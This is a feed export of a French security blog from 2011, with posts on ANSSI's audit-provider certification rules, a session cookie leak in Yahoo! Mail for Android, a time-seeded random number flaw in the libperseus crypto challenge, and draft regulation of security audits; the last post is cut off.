<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-16926911</id><updated>2012-01-29T03:52:59.438+01:00</updated><title type='text'>newsoft's fun blog</title><subtitle type='html'>Un blog où il y a de tout ... et parfois de la sécurité informatique.</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><link rel='next' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default?start-index=101&amp;max-results=100'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>183</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-16926911.post-6588693556454641475</id><published>2011-12-29T14:00:00.000+01:00</published><updated>2011-12-29T14:00:04.357+01:00</updated><title type='text'>Les jeux sont faits</title><content type='html'>&lt;p align="justify"&gt;Depuis le 16 décembre 2011 est en ligne la version 1.0 du &lt;a href="http://www.ssi.gouv.fr/IMG/pdf/referentiel-exigences_labellisation_prestataires-audit-teleservices_v1-0.pdf" target="_blank"&gt;&lt;em&gt;Référentiel d’exigences pour la labellisation des prestataires d’audit SSI&lt;/em&gt;&lt;/a&gt; - qui font partie des PSCO (Prestataires de Services de COnfiance, une notion introduite par le RGS). D’ailleurs &lt;a href="http://www.ssi.gouv.fr/fr/certification-qualification/qualification-d-un-prestataire-de-service-de-confiance/referentiels-techniques-de-qualification-des-psco.html" target="_blank"&gt;l’article de l’ANSSI&lt;/a&gt; précise que le document actuel sera intégré à la prochaine version du RGS.&lt;/p&gt;  &lt;p align="justify"&gt;Ce document - &lt;a href="http://news0ft.blogspot.com/2011/05/le-diable-est-dans-les-details.html" target="_blank"&gt;qui avait déjà fait parler de lui&lt;/a&gt; - n’est pas applicable en l’état : on peut lire page 7 que: « &lt;em&gt;La procédure d’évaluation de la conformité des prestataires d’audit aux règles du Référentiel qui leur sont applicables fera l’objet de documents complémentaires&lt;/em&gt; ».&lt;/p&gt;  &lt;p align="justify"&gt;Néanmoins le document existant mérite d’être étudié, car il est appelé à devenir une référence dans les futurs appels d’offres de l’administration – du moins si un nombre suffisant d’acteurs jouent le jeu, puisqu’on peut lire sur le site de l’ANSSI que : « &lt;em&gt;Les autorités administratives peuvent utiliser ce référentiel, en totalité ou en partie, dans les cahiers&lt;sup&gt;[&lt;a href="#note"&gt;1&lt;/a&gt;]&lt;/sup&gt; des charges de leurs appels d’offres de prestations d’audit. Une fois le nombre de qualification de prestataire d’audit suffisant, elles pourront également requérir que l’audit soit réalisé par un prestataire qualifié&lt;/em&gt; ».&lt;/p&gt;  &lt;p align="justify"&gt;Que le lecteur se rassure : je ne vais pas me lancer dans une analyse différentielle ligne à ligne des versions 0.9 et 1.0 du même document, mais plutôt jeter quelques bouteilles dans l’océan qui me sépare de l’administration.&lt;/p&gt;  &lt;p align="justify"&gt;Premier point qui me fait chaud au cœur : la page 10. Oui, vous ne rêvez pas, le terme « &lt;em&gt;ingénierie inverse&lt;/em&gt; » fait partie des compétences nécessaires au &lt;em&gt;pentester&lt;/em&gt;. C’est une révolution de palais – ou une facétie de l’éditeur, car ce terme n’apparaît plus en page 21 (tous les audits applicatifs nécessitent d’avoir accès au code source) ni en Annexe B (dans la liste des compétences techniques).&lt;/p&gt;  &lt;p&gt;Deuxième point notable : il n’est plus nécessaire de savoir tout faire. Un prestataire peut être certifié sur tout ou partie des périmètres suivants :    &lt;br /&gt;•&amp;#160;&amp;#160;&amp;#160; Audit d’architecture     &lt;br /&gt;•&amp;#160;&amp;#160;&amp;#160; Audit de configuration     &lt;br /&gt;•&amp;#160;&amp;#160;&amp;#160; Audit de code source     &lt;br /&gt;•&amp;#160;&amp;#160;&amp;#160; Test d’intrusion     &lt;br /&gt;•&amp;#160;&amp;#160;&amp;#160; Audit organisationnel &lt;/p&gt;  &lt;p align="justify"&gt;Il est précisé toutefois page 7 qu’un prestataire ne peut pas être certifié uniquement sur le test d’intrusion ou l’audit organisationnel : «&lt;em&gt; une telle activité étant jugée insuffisante si elle est menée seule &lt;/em&gt;». Voilà qui risque d’éliminer un certain nombre de micro-entreprises … &lt;em&gt;a contrario&lt;/em&gt;, j’en connais d’autres qui doivent jubiler devant une définition aussi proche de leur activité – il ne manque qu’une exigence sur les compétences juridiques et/ou CNIL pour éliminer le peu de concurrents encore en lice.&lt;/p&gt;  &lt;p align="justify"&gt;Le document se prononce également sur le délicat sujet du social engineering : on peut lire page 14 que les tests doivent être conduits « &lt;em&gt;dans le respect des personnels&lt;/em&gt; ». Ce sujet épineux avait déjà beaucoup agité la &lt;a href="http://www.journaldunet.com/solutions/99oct/991008charte.shtml" target="_blank"&gt;Fédération des Professionnels du Test d’Intrusion&lt;/a&gt; – lorsqu’elle existait.&lt;/p&gt;  &lt;p align="justify"&gt;Enfin le document donne en page 12 la réponse à la sempiternelle question : « qu’est-ce qu’un ancien hacker » ? Dormez tranquilles : « &lt;em&gt;Le prestataire d’audit peut également demander au candidat une copie du bulletin n° 3 de son casier judiciaire&lt;/em&gt; ». Le principe de bon sens « pas vu – pas pris » continue donc de s’appliquer. Désolé pour les « &lt;em&gt;&lt;a href="http://www.lerti.fr/web/offre_emploi.php" target="_blank"&gt;hackers repentis&lt;/a&gt;&lt;/em&gt; » … Il faut dire que les prestataires de services auraient été victimes de concurrence déloyale s’ils ne pouvaient pas recruter d’anciens hackers comme l’ANSSI ;)&lt;/p&gt;  &lt;p align="justify"&gt;Pour finir, une nouvelle compétence a fait son apparition en page 10 : « &lt;em&gt;L’auditeur doit disposer de qualités rédactionnelles et de synthèse et savoir s’exprimer à l’oral de façon claire et compréhensible, en langue française&lt;/em&gt; ». Moi qui était déjà favorable à la dictée lors des entretiens d’embauche, voilà désormais qu’il va falloir introduire le &lt;a href="http://en.wikipedia.org/wiki/Powerpoint-Karaoke" target="_blank"&gt;PowerPoint Karaoké&lt;/a&gt; … ce qui risque d’être autrement plus sélectif que le &lt;a href="http://communaute.sstic.org/ChallengeSSTIC2011" target="_blank"&gt;challenge SSTIC&lt;/a&gt; !&lt;/p&gt;  &lt;p align="justify"&gt;Pour conclure, il est encore difficile de dire où tout cela va nous mener. Quels vont être les critères techniques d’évaluation des prestataires, particulièrement dans des sciences molles comme l’audit organisationnel ? Qui va faire passer les certifications ? Des sociétés privées mandatées par l’ANSSI ? Y aura-t-il un QCM ? Sera-t-il possible de tricher ? Et surtout : est-ce que les prestataires vont se ruer vers la certification ?&lt;/p&gt;  &lt;p align="justify"&gt;L’expérience de la &lt;a href="http://www.ssi.gouv.fr/fr/produits-et-prestataires/produits-certifies-cspn/" target="_blank"&gt;CSPN&lt;/a&gt; semble montrer que le ratio complexité/intérêt s’est avéré trop élevé pour les prestataires d’audit comme pour les éditeurs de logiciels.&lt;/p&gt;  &lt;p align="justify"&gt;Même si ce référentiel va s’imposer de lui-même pour la prestation de service aux administrations, il n’est pas dit qu’il connaisse le même succès dans le domaine des prestations privées … surtout si un standard ou une norme - américaine ou internationale - apparaît d’ici là !&lt;/p&gt;  &lt;p align="justify"&gt;PS. Bonne année à tous ! Et oui, j’ai pris la résolution de bloguer plus en 2012 :)&lt;/p&gt;  &lt;p id="note" align="justify"&gt;&lt;font size="1"&gt;[1] Je me suis permis de corriger une typo ici, car les correcteurs orthographiques Microsoft sont notoirement meilleurs que leurs équivalents Open Source ;)&lt;/font&gt;&lt;/p&gt;  &lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-6588693556454641475?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/6588693556454641475/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=6588693556454641475' title='3 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/6588693556454641475'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/6588693556454641475'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2011/12/les-jeux-sont-faits.html' title='Les jeux sont faits'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-4404757027278352848</id><published>2011-06-09T11:00:00.000+02:00</published><updated>2011-06-09T11:13:48.947+02:00</updated><title type='text'>Yahoo! (ou Android ?) #fail</title><content type='html'>Un micro-post pour faire suite à mon intervention au &lt;a href="http://www.sstic.org/2011/programme/"&gt;SSTIC&lt;/a&gt; (et dissiper les malentendus lus sur Twitter).&lt;br /&gt;&lt;br /&gt;L'application "officielle" &lt;a href="http://fr.androlib.com/android.application.com-yahoo-mobile-client-android-mail-jixqC.aspx"&gt;Yahoo! Mail pour Android&lt;/a&gt; communique périodiquement en HTTP avec "controller.php" ... et fait fuir le cookie de session au passage.&lt;br /&gt;&lt;br /&gt;A ne jamais utiliser sur un WiFi non protégé, donc.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://newsoft.dyndns.org/blog/Yahoo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://newsoft.dyndns.org/blog/Yahoo.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-4404757027278352848?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/4404757027278352848/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=4404757027278352848' title='2 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/4404757027278352848'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/4404757027278352848'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2011/06/yahoo-ou-android-fail.html' title='Yahoo! (ou Android ?) #fail'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-734423754297836365</id><published>2011-06-03T08:00:00.000+02:00</published><updated>2011-06-03T08:00:08.773+02:00</updated><title type='text'>Challenge #fail</title><content type='html'>&lt;p&gt;Je ne parle pas du &lt;a href="http://communaute.sstic.org/ChallengeSSTIC2011"&gt;Challenge SSTIC&lt;/a&gt; évidemment, qui était encore une fois de très bonne facture (félicitations aux gagnants … et aux organisateurs).&lt;/p&gt;  &lt;p&gt;Je parle plutôt du &lt;a href="http://www.rssil.org/iawacs-2011"&gt;Challenge iAWACS/RSSIL&lt;/a&gt;. Enfin le &lt;a href="http://cvo-lab.blogspot.com/2011/05/iawacsrssil-2011-libperseus-challenge.html"&gt;challenge officiel&lt;/a&gt;, pas celui qui consiste à &lt;a href="http://www.rssil.org/conferences"&gt;pirater des sites Internet en live&lt;/a&gt; et pouvoir rentrer chez soi tranquillement.&lt;/p&gt;  &lt;p&gt;Le principe de ce challenge est simple: deux fichiers chiffrés avec un algorithme “maison” sont publiés. La première personne capable de produire les fichiers source gagne 3000€.&lt;/p&gt;  &lt;p&gt;Bien entendu, afin de respecter le &lt;a href="http://fr.wikipedia.org/wiki/Principe_de_Kerckhoffs"&gt;principe de Kerckhoffs&lt;/a&gt;, l’algorithme utilisé a également été &lt;a href="http://code.google.com/p/libperseus/"&gt;publié&lt;/a&gt;. Le challenge consiste donc à cryptanalyser cet algorithme. Ou plutôt devrait consister.&lt;/p&gt;  &lt;p&gt;En effet, une &lt;a href="http://code.google.com/p/libperseus/source/browse/trunk/perseus.c"&gt;lecture attentive des sources&lt;/a&gt; permet d’identifier la séquence de code suivante:&lt;/p&gt;  &lt;p&gt;&lt;font face="Courier New"&gt;PUNCT_CONC_CODE * generateCode()     &lt;br /&gt;{      &lt;br /&gt;(...)      &lt;br /&gt;&amp;#160; now = time(NULL);      &lt;br /&gt;&amp;#160; while(now == (time_t)(-1)) now = time(NULL);      &lt;br /&gt;&amp;#160; srand(now);&lt;/font&gt;&lt;/p&gt;  &lt;p&gt;&lt;font face="Courier New"&gt;(...)&lt;/font&gt;&lt;/p&gt;  &lt;p&gt;&amp;#160;&lt;/p&gt;  &lt;p&gt;Et dans le &lt;a href="http://code.google.com/p/libperseus/source/browse/trunk/perseus_test.c"&gt;programme de test&lt;/a&gt;:&lt;/p&gt;  &lt;p&gt;&lt;font face="Courier New"&gt;aKey-&amp;gt;INIT1 = (unsigned long int)((float)(0xFFFFFFFFL) * alea());     &lt;br /&gt;aKey-&amp;gt;INIT2 = (unsigned long int)((float)(0xFFFFFFFFL) * alea());      &lt;br /&gt;aKey-&amp;gt;INIT3 = (unsigned long int)((float)(0xFFFFFFFFL) * alea());      &lt;br /&gt;aKey-&amp;gt;INIT4 = (unsigned long int)((float)(0xFFFFFFFFL) * alea());&lt;/font&gt;&lt;/p&gt;  &lt;p&gt;&amp;#160;&lt;/p&gt;  &lt;p&gt;Sachant que la &lt;a href="http://code.google.com/p/libperseus/source/browse/trunk/perseus.h"&gt;définition de la macro&lt;/a&gt; &lt;font face="Courier New"&gt;alea()&lt;/font&gt; est plutôt simple:&lt;/p&gt;  &lt;p&gt;&lt;font face="Courier New"&gt;/* alea(): a random float in [0, 1]&amp;#160;&amp;#160;&amp;#160;&amp;#160;&amp;#160; */     &lt;br /&gt;#define alea() (rand()/(RAND_MAX + 1.0))&lt;/font&gt;&lt;/p&gt;  &lt;p&gt;&amp;#160;&lt;/p&gt;  &lt;p&gt;Le &lt;a href="http://newsoft-tech.blogspot.com/2009/09/unique-is-not-random-is-not-secure.html"&gt;lecteur averti&lt;/a&gt; aura remarqué que la simple connaissance du &lt;font face="Courier New"&gt;&lt;a href="http://www.linux-kheops.com/doc/man/manfr/man-html-0.9/man2/time.2.html"&gt;time()&lt;/a&gt;&lt;/font&gt; – en secondes - à l’instant de la génération du fichier permet de casser entièrement le challenge. Même en visant large - disons 1 an – la complexité calculatoire reste donc inférieure à 2&lt;sup&gt;25&lt;/sup&gt;.&lt;/p&gt;  &lt;p&gt;Je ne cours pas après l’argent, mais 3000€ en 10 minutes reste une affaire rentable :) Toutefois les deux fichiers fournis présentent un entête qui ne semble pas provenir de la librairie fournie par l’auteur.&lt;/p&gt;  &lt;p&gt;&lt;font face="Courier New"&gt;$ xxd -l 64 challenge_lipperseus1     &lt;br /&gt;0000000: 4631 3232 3938 4630 3030 0067 51b3 df01&amp;#160; &lt;font color="#ff0000"&gt;&lt;strong&gt;F12298F000&lt;/strong&gt;&lt;/font&gt;.gQ...      &lt;br /&gt;0000010: b663 4b33 4565 0637 0c1f 7912 4e39 64e5&amp;#160; .cK3Ee.7..y.N9d.      &lt;br /&gt;0000020: 7f71 3678 5438 2276 3c34 4726 13b8 6b37&amp;#160; .q6xT8&amp;quot;v&amp;lt;4G&amp;amp;..k7      &lt;br /&gt;0000030: 3a4a d9c5 3f9c 6d43 ccc6 37f8 59ec 33df&amp;#160; :J..?.mC..7.Y.3.      &lt;br /&gt;$ xxd -l 64 challenge_lipperseus2      &lt;br /&gt;0000000: 4638 3230 3946 3030 3030 ad94 31b0 1ec1&amp;#160; &lt;strong&gt;&lt;font color="#ff0000"&gt;F8209F0000&lt;/font&gt;&lt;/strong&gt;..1...      &lt;br /&gt;0000010: 82c1 4de0 9c97 2797 52f1 458a 5b40 2fe7&amp;#160; ..M...'.R.E.[@/.      &lt;br /&gt;0000020: 09b8 fe85 2ea7 2f7a 186b 277f 65a4 5275&amp;#160; ....../z.k'.e.Ru      &lt;br /&gt;0000030: 6cfb 845d c6a7 32b3 9141 db25 3526 456b&amp;#160; l..]..2..A.%5&amp;amp;Ek&lt;/font&gt;&lt;font face="Courier New"&gt;&lt;/font&gt;&lt;/p&gt;  &lt;p&gt;&lt;font face="Courier New"&gt;&lt;/font&gt;&lt;/p&gt;  &lt;p&gt;D’ailleurs, la librairie disponible en ligne ne compile même pas &lt;a href="http://code.google.com/p/libperseus/source/browse/trunk/perseus.c#1309"&gt;à cause d’une typo&lt;/a&gt;. Il est donc difficile de croire que les fichiers aient été “&lt;a href="http://cvo-lab.blogspot.com/2011/05/additional-information-about-libperseus.html"&gt;produit directement à partir de ce code source&lt;/a&gt;” ;)&lt;/p&gt;  &lt;p&gt;Je m’enquière donc du programme original (principe de Kerckhoffs, toujours). Et visiblement &lt;a href="http://cvo-lab.blogspot.com/2011/05/additional-information-about-libperseus.html#comments"&gt;je ne suis pas le seul à avoir remarqué&lt;/a&gt; le problème.&lt;/p&gt;  &lt;p&gt;L’affaire aurait pu en rester là, mais &lt;a href="http://cvo-lab.blogspot.com/2011/05/propos-du-challenge-perseus.html"&gt;l’auteur a cru bon de répondre&lt;/a&gt;. Et là, à défaut d’un gros chèque, je tenais un solide blogpost ;)&lt;/p&gt;  &lt;p&gt;Je vous laisse lire la réponse en question, car chaque ligne est délectable. Vraiment. Tenter de la résumer en quelques lignes serait risquer d’en perdre le substantifique fiel. Sans parler du &lt;a href="http://cvo-lab.blogspot.com/2011/05/iawacsrssil-2011-libperseus-challenge.html"&gt;blogpost d’origine&lt;/a&gt; qui a lui aussi été édité (oh la vilaine pratique).&lt;/p&gt;  &lt;p&gt;Dans tous les cas, en ce qui me concerne, je vais continuer à penser “que les attaquants feront toujours des erreurs exploitables”, puisque l’usage de &lt;font face="Courier New"&gt;rand()&lt;/font&gt; pose toujours autant de problèmes en 2011 qu’en &lt;a href="http://wiki.debian.org/SSLkeys"&gt;2008&lt;/a&gt; … ou qu’en &lt;a href="http://fr.wikipedia.org/wiki/%C3%89ric_Filiol#cite_note-1"&gt;2003&lt;/a&gt;.&lt;/p&gt;  &lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-734423754297836365?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/734423754297836365/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=734423754297836365' title='10 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/734423754297836365'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/734423754297836365'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2011/06/challenge-fail.html' title='Challenge #fail'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>10</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-8722508074991101260</id><published>2011-05-16T08:00:00.001+02:00</published><updated>2011-05-16T11:04:24.628+02:00</updated><title type='text'>Le diable est dans les détails</title><content type='html'>&lt;div align="justify"&gt;Ainsi donc &lt;b&gt;l'activité d'audit sécurité va être réglementée en France&lt;/b&gt;. &lt;a href="http://www.ssi.gouv.fr/site_article328.html"&gt;Le projet est encore en phase expérimentale&lt;/a&gt;, mais le processus étant enclenché, il est inéluctable (modulo le temps de convergence des autorités concernées). Il faut dire que l'&lt;a href="http://www.arjel.fr/"&gt;ARJEL&lt;/a&gt; avait déjà ouvert cette voie&lt;a href="http:/#_ftn1_1423" name="_ftnref1_1423"&gt;[1]&lt;/a&gt; en fournissant une &lt;a href="http://www.arjel.fr/-Organismes-certificateurs-.html"&gt;liste d'organismes certificateurs&lt;/a&gt;.&lt;/div&gt;&lt;div align="justify"&gt;C'est une idée qui circule depuis quelques temps, sans que j'en aie bien compris les avantages. Car si tout un chacun peut effectivement constater que le marché est inondé par des charlatans ou des sociétés unipersonnelles&lt;a href="http:/#_ftn2_1423" name="_ftnref2_1423"&gt;[2]&lt;/a&gt;, l'apport effectif d'une réglementation reste à prouver. En théorie "&lt;b&gt;la main invisible&lt;/b&gt; du marché" est censée faire son travail. Et elle le fait plutôt bien: la plus grosse partie de l'activité fonctionne par bouche à oreille. Quant aux "&lt;a href="http://www.hsc-news.com/archives/2009/000054.html"&gt;tests d'intrusion qui n'intrusent pas&lt;/a&gt;", ils correspondent aussi à une demande de certains clients: les mauvais ont donc leur place dans l'écosystème, c'est pour cela qu'ils y survivent.&lt;/div&gt;&lt;div align="justify"&gt;Maintenant regardons de plus près l'avant-projet produit par l'ANSSI (&lt;b&gt;version 0.9&lt;/b&gt;).&lt;/div&gt;&lt;h3&gt;Chapitres 3 et 4: de la mesure des compétences techniques&lt;/h3&gt;&lt;div align="justify"&gt;Ce qui frappe en premier lieu, c'est le &lt;b&gt;très haut niveau d'exigence&lt;/b&gt; requis par ce document. J'ai immédiatement pensé à la &lt;a href="http://www.ssi.gouv.fr/site_rubrique130.html"&gt;VAE ESSI&lt;/a&gt;, qui nécessite des compétences aussi diverses que la cryptographie, l'intelligence économique, la gestion d'une équipe et d'un budget, et un anglais parfait. Au passage, si quelqu'un a des chiffres sur le nombre de VAE ESSI délivrées, merci de les poster en commentaire …&lt;/div&gt;&lt;div align="justify"&gt;Dans l'avant-projet, on peut lire que "&lt;i&gt;le prestataire d'audit doit s'assurer que les compétences [techniques | organisationnelles], théoriques et pratiques, de l'ensemble des auditeurs qu'il emploie couvre les domaines suivants […]&lt;/i&gt;". S'en suit une longue liste à la Prévert, allant des systèmes &amp;amp; réseaux, du développement d'outils intrusifs&lt;a href="http:/#_ftn3_1423" name="_ftnref3_1423"&gt;[3]&lt;/a&gt;, à la maitrise de la norme ISO 27001, de la méthode EBIOS et du RGS, entre autres. Cette liste est détaillée dans les grandes largeurs en annexe A.&lt;/div&gt;&lt;div align="justify"&gt;Puisque nous sommes dans le chapitre 3, cette exigence s'applique a priori à la société prestataire et pas à chaque auditeur individuellement. Mais la plupart des prestataires de taille moyenne (disons, moins de 20 personnes) - et il en existe beaucoup dans le secteur - sont quasiment assurés d'avoir un "&lt;b&gt;trou dans la raquette&lt;/b&gt;" … Quant aux autres, il restera très difficile de valider que toutes les compétences soient &lt;b&gt;disponibles&lt;/b&gt;, &lt;b&gt;persistantes&lt;/b&gt; (dans un contexte de &lt;i&gt;turn-over&lt;/i&gt; important), et &lt;b&gt;utilisées&lt;/b&gt; si la mission le requière.&lt;/div&gt;&lt;div align="justify"&gt;Dans le chapitre 4 - qui concerne les auditeurs eux-mêmes - il est &lt;b&gt;recommandé&lt;/b&gt; que les auditeurs, disposent d'un bac+5 reconnu d'état, justifient en sus de 2 ans d'expérience en informatique "pure", 1 an d'expérience en sécurité, et 1 an d'expérience en audit. Autant dire qu'on n'est pas loin du mouton à 5 pattes, surtout avec les &lt;a href="http://sid.rstack.org/blog/index.php/419-de-la-penurie-de-pentesteurs"&gt;difficultés de recrutement actuelles&lt;/a&gt; (et futures, à en juger par la production du système éducatif dans le domaine).&lt;/div&gt;&lt;div align="justify"&gt;De mon expérience, la mesure objective des compétences techniques est un exercice très difficile … et inutile.&lt;/div&gt;&lt;div align="justify"&gt;&lt;b&gt;Difficile&lt;/b&gt;, car à moins d'enfermer le candidat dans une pièce pendant des heures (sans accès Internet) pour le faire plancher sur des travaux pratiques, il n'est possible d'estimer "au jugé" qu'une infime partie des compétences annoncées sur le CV (dont la liste dépasse souvent les 50 entrées).&lt;/div&gt;&lt;div align="justify"&gt;Comme l'ANSSI, nous disposons d'un questionnaire technique "&lt;b&gt;infaisable&lt;/b&gt;"&lt;a href="http:/#_ftn4_1423" name="_ftnref4_1423"&gt;[4]&lt;/a&gt; qui sert uniquement à disqualifier de manière objective un candidat "qu'on ne sent pas". Mais un simple QCM ne peut pas valider des compétences techniques très poussées (tout au plus peut-il servir à délivrer une certification ;).&lt;/div&gt;&lt;div align="justify"&gt;&lt;b&gt;Inutile&lt;/b&gt;, car c'est plus la capacité à apprendre rapidement qui est importante. Le document cite des technologies de bases de données: Oracle, MS-SQL, MySQL et PostgreSQL. Mais j'ai également été confronté à SolidDB (produits Cisco), Access, SQLite (Android), Sybase SQL Anywhere, et probablement d'autres oubliés depuis.&lt;/div&gt;&lt;div align="justify"&gt;Or aucune société ne peut maintenir à jour des auditeurs sur toutes ces technologies: ce qui compte c'est la rapidité avec laquelle l'auditeur appréhende une nouvelle technologie. Tout candidat qui n'a pas déjà &lt;b&gt;réellement utilisé&lt;/b&gt; au moins 3 systèmes d'exploitation, 3 architectures matérielles, et 3 langages de programmation est pour moi un &lt;i&gt;rookie&lt;/i&gt; (quelle que soit son expertise dans un domaine très pointu tel que "l'assembleur Intel x86 en environnement Microsoft Windows").&lt;/div&gt;&lt;div align="justify"&gt;L'exemple des challenges de sécurité (tels que &lt;a href="http://communaute.sstic.org/"&gt;celui du SSTIC&lt;/a&gt;) est frappant: le top 10 est à peu près toujours le même. Or je ne peux pas croire que les gagnants récurrents ont étudié a priori des technologies aussi variées que le mode V8086 du processeur Intel ou le système d'exploitation Android. Ils ont &lt;b&gt;appris sur le tas&lt;/b&gt;, en temps contraint. C'est à mon avis la seule qualité nécessaire à la pratique du test d'intrusion, compte-tenu de la diversité des missions et de l'environnement technologique mouvant dans lequel nous évoluons.&lt;/div&gt;&lt;h3&gt;Chapitre 5: incise sur l'obsolescence des technologies&lt;/h3&gt;&lt;div align="justify"&gt;Le chapitre 5, comme l'Annexe A, contiennent des détails techniques tout à fait inattendus.&lt;/div&gt;&lt;div align="justify"&gt;Il est question de chercher des failles de type &lt;i&gt;Cross-Site Scripting&lt;/i&gt; (le terme n'a pas été francisé ;), injection SQL, et &lt;i&gt;Cross-Site Request Forgery&lt;/i&gt;. Pourtant la liste des erreurs potentielles est &lt;a href="http://cwe.mitre.org/top25/index.html"&gt;bien plus longue&lt;/a&gt;.&lt;/div&gt;&lt;div align="justify"&gt;Il me semble ambitieux de citer des technologies, voire des produits commerciaux, dans un document de référence sur les technologies que doit maitriser un auditeur ou un prestataire d'audit. Il m'a déjà été donné de voir du code FORTRAN en audit, tout autant que des applications Android. Comme explicité précédemment, c'est la maitrise de quelques &lt;b&gt;concepts fondamentaux&lt;/b&gt; et la &lt;b&gt;capacité à apprendre&lt;/b&gt; qui me semblent essentiels à mesurer.&lt;/div&gt;&lt;h3&gt;Le paradoxe français, premier acte&lt;/h3&gt;&lt;div align="justify"&gt;J'aimerais ici parler du voile pudique jeté sur l'audit d'applications en source fermée.&lt;/div&gt;&lt;div align="justify"&gt;Compte-tenu des technologies mentionnées en annexe, on sent que le document s'applique à un nombre limité de prestations d'audit: les réseaux internes, les réseaux d'interconnexion, les applications Web, la téléphonie (sur IP … ou pas), et les environnements virtualisés.&lt;/div&gt;&lt;div align="justify"&gt;Exit donc par exemple les audits de systèmes embarqués (comme les imprimantes, les caméras WiFi les caisses de cantine ou les badgeuses). Le cas de "l'audit d'applications lourdes de type client/serveur" est réglé en une ligne dans l'annexe ... Quant au problème du &lt;i&gt;Cloud Computing&lt;/i&gt;, il ne semble pas encore avoir atteint l'administration:&lt;/div&gt;&lt;div align="justify"&gt;"&lt;i&gt;Les tests d'intrusion ne devraient pas être réalisés sur des plate-formes d'hébergement mutualisées.&lt;/i&gt;"&lt;/div&gt;&lt;div align="justify"&gt;D'après ce document, aucune compétence en &lt;i&gt;reverse engineering&lt;/i&gt; n'est donc requise pour être un excellent auditeur sécurité. Ce qui est &lt;b&gt;bien entendu faux&lt;/b&gt; dans la pratique, ne serait-ce que pour le développement des codes d'exploitation dont il va être question juste après.&lt;/div&gt;&lt;h3&gt;Le paradoxe français, deuxième acte&lt;/h3&gt;&lt;div align="justify"&gt;Bien entendu, l'administration se doit d'être &lt;b&gt;exemplaire&lt;/b&gt; et ne peut mentionner la pratique du &lt;i&gt;reverse engineering&lt;/i&gt; dans un document officiel. D'ailleurs il est bien précisé que: "&lt;i&gt;f) Le prestataire d'audit est tenu de respecter la législation et la réglementation en vigueur […]&lt;/i&gt;".&lt;/div&gt;&lt;div align="justify"&gt;Mais là où ça devient cocasse, c'est lorsqu'il est dit plus loin que: "&lt;i&gt;Le prestataire d'audit doit fournir, à la fin de l'audit, les développements spécifiques réalisés lors de l'audit pour valider les scénarios d'exploitation des vulnérabilités. Ces développements peuvent être fournis sous la forme de scripts ou de programmes compilés, accompagnés de leur code source, ainsi que d'une brève documentation de mise en œuvre et d'utilisation&lt;/i&gt;".&lt;/div&gt;&lt;div 